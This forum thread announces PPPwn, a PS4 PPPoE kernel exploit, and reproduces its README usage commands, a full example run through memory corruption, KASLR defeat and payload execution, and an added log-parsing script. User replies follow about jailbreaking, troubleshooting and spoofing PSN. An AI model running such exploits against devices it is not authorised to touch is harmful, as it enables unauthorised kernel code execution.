Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: Apr 30, 2024 at 2:26 PM | Replies: 264
Today TheOfficialFloW aka theflow0 decided to publish PPPwn ahead of his Remote Vulnerabilities in SPP talk on CVE-2006-4304 (FreeBSD.org) at TyphoonCon 2024 next month. It is the first PlayStation 4 PPPoE (Point-to-Point Protocol over Ethernet) RCE (Remote Code Execution) kernel exploit, supporting PS4 firmware versions up to 11.00 OFW.

Alongside it, @KIWIDOGGIE aka kd_tech_ passed along some 11.00 offsets (Orbis110.hpp) that can help in reverse-engineering payloads, crediting developer @Al Azif (fw_defines.h / payloads_1100_and_below.zip - 46.3 KB, which includes ps4-app-dumper.bin, ps4-disable-updates.bin, ps4-fan-threshold.bin, ps4-ftp.bin, ps4-module-dumper.bin, ps4-permanent-uart.bin and ps4-todex.bin via @zecoxao aka notnotzecoxao). Also available are stage2.bin (11.2 KB) and additional payloads (module_dumper.bin - 10.7 KB, permanent_uart.bin - 6.84 KB, pup_decrypter.bin - 16.8 KB, update_blocker.bin - 5.48 KB; rename to payload.bin and put on USB), plus Enable Debug Menu Settings and FPKG patches (stage2_10.00.bin - 10.9 KB, stage2_10.01.bin - 10.9 KB, stage2_11.00.bin - 10.9 KB; rename the file to stage2.bin and put it in the stage2 folder) via @LightningMods aka LightningMods_, with Pull Requests for ports spanning 7.00, 7.01, 7.02, 7.50, 7.51, 7.55, 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60, 10.00, 10.01, 10.50, 10.70, 10.71 and 11.00.

While PS5 Firmware versions up to 8.20 OFW were confirmed as vulnerable to CVE-2006-4304 by theflow0 previously, according to @CrazyVoid on Twitter, "what flow released is for PS4. the PS5 is different then PS4, it might not be able to be exploited the same way" with @SpecterDev elaborating on Twitter, "Since I've seen a lot of ppl asking about it, theflow's latest RCE won't easily be adapted to PS5. PS4 is much weaker in terms of mitigations which played a part in allowing a remote exploit w/o userland code execution. PS5 is different. SMAP+CFI make this much harder to do."

He went on to state via Twitter, "XOM also plays a role, even if CFI were a non-issue, you can't easily get gadgets to ROP with either. It might not be impossible but a new strategy would be needed and you'd need to go for R/W. You'd also likely need userland code exec. I wouldn't expect anything soon.."

Here are further details from the PPPwn README.md:

PPPwn - PlayStation 4 PPPoE RCE

PPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation.

Supported versions are:
  • FW 7.00 / 7.01 / 7.02
  • FW 7.50 / 7.51 / 7.55
  • FW 8.00 / 8.01 / 8.03
  • FW 8.50 / 8.52
  • FW 9.00
  • FW 9.03 / 9.04
  • FW 9.50 / 9.51 / 9.60
  • FW 10.00 / 10.01
  • FW 10.50 / 10.70 / 10.71
  • FW 11.00
  • more can be added (PRs are welcome)
The exploit only prints PPPwned on your PS4 as a proof-of-concept. In order to launch Mira or similar homebrew enablers, the stage2.bin payload needs to be adapted.

Requirements
  • Computer with Ethernet port
    • USB adapter also works
  • Ethernet cable
  • Linux
    • You can use VirtualBox to create a Linux VM with Bridged Adapter as network adapter to use the ethernet port in the VM.
  • Python3 and gcc installed
Usage

On your computer, clone the repository:
Code:
git clone --recursive https://github.com/TheOfficialFloW/PPPwn
Change the directory to the cloned repository:
Code:
cd PPPwn
Install the requirements:
Code:
sudo pip install -r requirements.txt
Compile the payloads:
Code:
make -C stage1 FW=1100 clean && make -C stage1 FW=1100
make -C stage2 FW=1100 clean && make -C stage2 FW=1100
For other firmwares, e.g. FW 9.00, pass FW=900.

DO NOT RUN the exploit just yet (don't press Enter yet) but prepare this command on your prompt (see ifconfig for the correct interface):
Code:
sudo python3 pppwn.py --interface=enp0s3 --fw=1100
For other firmwares, e.g. FW 9.00, pass --fw=900.

On your PS4:
  • Go to Settings and then Network
  • Select Set Up Internet connection and choose Use a LAN Cable
  • Choose Custom setup and choose PPPoE for IP Address Settings
  • Enter anything for PPPoE User ID and PPPoE Password
  • Choose Automatic for DNS Settings and MTU Settings
  • Choose Do Not Use for Proxy Server
  • Now, simultaneously press the 'X' button on your controller on Test Internet Connection and 'Enter' on your keyboard (on the computer you have your Python script ready to run).
ALWAYS wait for the console to show the message "Cannot connect to network: (NW-31274-7)" before trying this PPPoE injection again.

If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on Test Internet Connection. Kill the pppwn.py script and run it again on your computer, and then click on Test Internet Connection on your PS4: always simultaneously.

If the exploit works, you should see an output similar to below, and you should see Cannot connect to network. followed by PPPwned printed on your PS4, or the other way around.

Example run
Code:
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000

[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!
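As an added illustration (not part of PPPwn or its README), here is a small Python helper that reads a saved pppwn.py log like the example run above and reports which stage the run reached, so a failed attempt can be matched to the retry advice given earlier; SAMPLE_LOG is a constructed excerpt that reuses the addresses printed in the example run.

```python
import re

# Constructed excerpt of a pppwn.py run, modelled on the README's example run
# (same addresses as printed there; a real run has many more [*] lines).
SAMPLE_LOG = """\
[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] AC cookie length: 0x4e0
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
"""

STAGE_RE = re.compile(r"^\[\+\] STAGE (\d+): (.+)$")
VALUE_RE = re.compile(r"^\[\+\] ([\w ]+): (\S+)$")   # "[+] name: value" lines


def parse_run(log):
    """Last stage entered, whether '[+] Done!' was reached, and printed values."""
    run = {"stage": None, "stage_name": None, "done": False, "values": {}}
    for line in log.splitlines():
        line = line.strip()
        if line == "[+] Done!":
            run["done"] = True
            continue
        m = STAGE_RE.match(line)
        if m:
            run["stage"], run["stage_name"] = int(m.group(1)), m.group(2)
            continue
        m = VALUE_RE.match(line)
        if m:
            key, val = m.groups()
            run["values"][key] = int(val, 16) if val.startswith("0x") else val
    return run


def diagnose(run):
    """Turn the summary into the next step the README / thread suggests."""
    if run["done"]:
        return "completed: stage2 payload was sent"
    if run["stage"] in (None, 0):
        # Thread reports: STAGE 0 stalls were cured by swapping the Ethernet cable.
        return ("stalled in STAGE 0: wait for NW-31274-7 on the console, check the "
                "cable/interface, then retry")
    return "stopped in STAGE %d (%s): kill pppwn.py and retry" % (
        run["stage"], run["stage_name"])
```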
Notes for Mac Apple Silicon Users (arm64 / aarch64)

The code will not compile on Apple Silicon and requires amd64 architecture. There is a workaround using docker which will build the bin files required. Clone this repository to your mac system, then from the repo folder run ./build-macarm.sh. This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders.

To build the binaries for a different version, e.g. 900, run the command as such: ./build-macarm.sh 900. Once built, copy this folder structure into the Linux VM and execute as instructed above. This has been tested using VMware Fusion 13.5.1, with the VM guest as Ubuntu 24.04 and the host machine on macOS 14.4.1.

Notes for GoldHEN version

This loader only supports payloads with a kernel entrypoint. The custom version of stage2 first looks for the payload in the root directory of the USB drive, and if found, it is copied to the internal HDD at this path: /data/GoldHEN/payloads/goldhen.bin. The internal payload is then loaded and is no longer needed on the external USB drive. At the moment, only firmware versions 9.00, 10.00, 10.01 and 11.00 are supported. Other versions like 9.60 will also be supported.

Reminder: all GoldHEN related issues, updates, etc. go in the ongoing discussion topic for it.

Comments

I recently got back into playing my PS4 and had previously tried the old jailbreak from years ago, but after not having the console on for literally years I was glad to see that I left it on a suitable firmware (v9.00), so I have been happily using the new jailbreak method for a couple of weeks now on that console.

I've even sent off for one of those plug and play ethernet devices so just waiting for it to arrive, at the moment I'm using my LG TV to run the jailbreak.

A few days ago I bought a PS4 Pro cheap just hoping it would be on 11 or lower, but sadly it's on 11.03; still, it will be waiting for me once a jailbreak comes for 11+ and I have the 'normal' PS4 till then.
 
I am on FW 10.00, and I was able to use the pppwn.exe version, but I had a bit of an oddity. I kept getting a failure fairly quickly on the PS4 side that said 'A DNS Server cannot be used' around the time the heap grooming was starting on the exploit side. I rebooted everything. No dice.

On a whim, I tried a different ethernet cable, and everything worked on the next try. I've tested the 'bad cable' and it seems great elsewhere, but something about it didn't work for PPPwn. Hopefully if someone else gets the same error, they find this.
 
I had this issue too on the first try! Tested with one (working) ethernet cable with no luck... tried another one and got it working in a couple of seconds.

Then I checked the cable itself with an RJ45 cable tester, and I noticed that the first cable was in fact a CAT5e with only 2 twisted pairs (those cables are elsewhere perfectly functional, but only allow 100 Mbps speed to be negotiated).

Dunno if it's related to the issue, but I manually crimped 2 more cables just out of curiosity and the test seems to be confirming my hypothesis...

Anyway, got it working with a short, good CAT6 cable and a Luckfox Pico, extremely convenient as you can leave it attached to the console, and it turns itself off automatically after the JB.

The last issue was how to properly shut down the console (the JB sometimes leaves the console pretty stuck when you turn it off)... well, turns out today that the only thing you need to do is to disable the internet connection.
 
This is incredible, nice and easy to follow and I thought I hit a dead end when I found that PC emulation isn't great yet.

I see a lot of people reporting switching the ethernet cable when it fails, but I find it doesn't work every execution anyway. If it works 50% of the time, it's not the ethernet switching that did it, idk if that's the case for everyone but I'm pointing it out to maybe save someone a step, try again, try again, restart, try again.
 
This exploit is AMAZING! The moment I heard about it, I dusted off my old PS4, formatted my Raspberry Pi's SD card, and cloned the Pi-PWN repo that @stooged made. From there, it was smooth sailing, and I’ve been diving deeper into this fascinating scene ever since. Gotta admit, though, it was a bit nerve-wracking injecting prebuilt binaries from sources I wasn’t familiar with… but all in the name of tinkering, right? 😅

I wanted to share something useful in my first post, so here’s a random tidbit that might help someone out there:

I noticed some folks out there were having trouble setting up an FTP connection with the PPPoE NAT implementation of the Pi-PWN repo. The issue might be that they didn't catch @stooged's note in the README.md to set the FTP client to "Active" mode instead of "Passive" mode. Especially if they're using FileZilla, they might not realize what the issue is as it won't log anything useful when things go wrong. On top of that, by default, FileZilla doesn't fall back to active mode after the initial FTP handshake, which can cause headaches.

A potential fix is enabling a Linux kernel module that is a nftables helper which rewrites FTP protocol messages (like the PASV message from the GoldHen FTP server) between the client and server behind a NAT: `nf_nat_ftp`. Just add `sudo modprobe nf_nat_ftp` in `pppoe.sh`, and Active mode FTP should work just fine from that point onwards.

Sidenote: I always assumed kernel modules like the one mentioned above were autoloaded, but apparently that does not seem to be the case for `nf_nat_ftp`, although others (i.e. `nf_conntrack_nat`) are autoloaded. I have no clue why that is, so if any people knowledgeable about the Linux kernel autoload subsystem are reading this, I would love to know your thoughts on this! :)

Anyways, really excited to join this community, learn more about the fundamentals of the FreeBSD-based PS4 kernel and (hopefully!) eventually contribute and build cool stuff together with you guys!
 
I'm new to the PS4 scene, but recently acquired a PS4 Slim (11.00) and decided to give it a whirl. Wiped it, formatted a new 1 TB SSD that's attached through USB, and used the PPPwn exploit (PC based tool), which worked amazingly well. I haven't run into any issues really; PKG installation is pretty straightforward.

I am wondering though if there is a PSN spoof for 11.00 that will let me log in to my PSN account somehow just so I'm not running a generic profile. As updating isn't an option if I want to keep it pwn'd, is there a way to spoof PSN using a router or PC somehow? Thanks
 
I recently jailbroke my 11.0 Slim PS4 with the Luckfox Pico, very easy method but I'm having a big problem: My save files are being deleted without any reason, I already lost 2 saves from different games, so the PKG isn't the problem.

Does anyone have any suggestion of what I can do? I'm thinking about saving with Apollo to a USB drive, but Apollo is very confusing to use :o
 
I'm looking for a MALE AUX PS4 connector; is there a way to get one?

@bowura I had the same problem, but I associate it with the fact that the console went into kernel panic twice in a row, and having an HDD the data can be corrupted more easily.
 
For the previous post - I will try and find the German one I used if I still have the email. Radio Shack might have had it.

Concerning PPPwn and Luckfox: I have been using a Luckfox to jailbreak my 2 PS4 Pros, one on 9.00 and the other on 11.00.

They both share the same problem. Neither system likes to reboot from rest mode (I unplug my Luckfox when in rest mode), and sometimes when I just click my PS4 controller it might turn on. What usually happens is either the PS4 won't boot clean or enter true rest mode, or sometimes shut down. When I shut down the PS4 it sometimes has the "need to repair" message at startup (I changed the HDMI cable to fix the boot problem but now it is back).

When either boots it needs to repair the PS4 and external storage. The PPPwn jailbreaks the PS4s. It is the next startup that is the issue.

Any suggestions would be appreciated. Thank you
 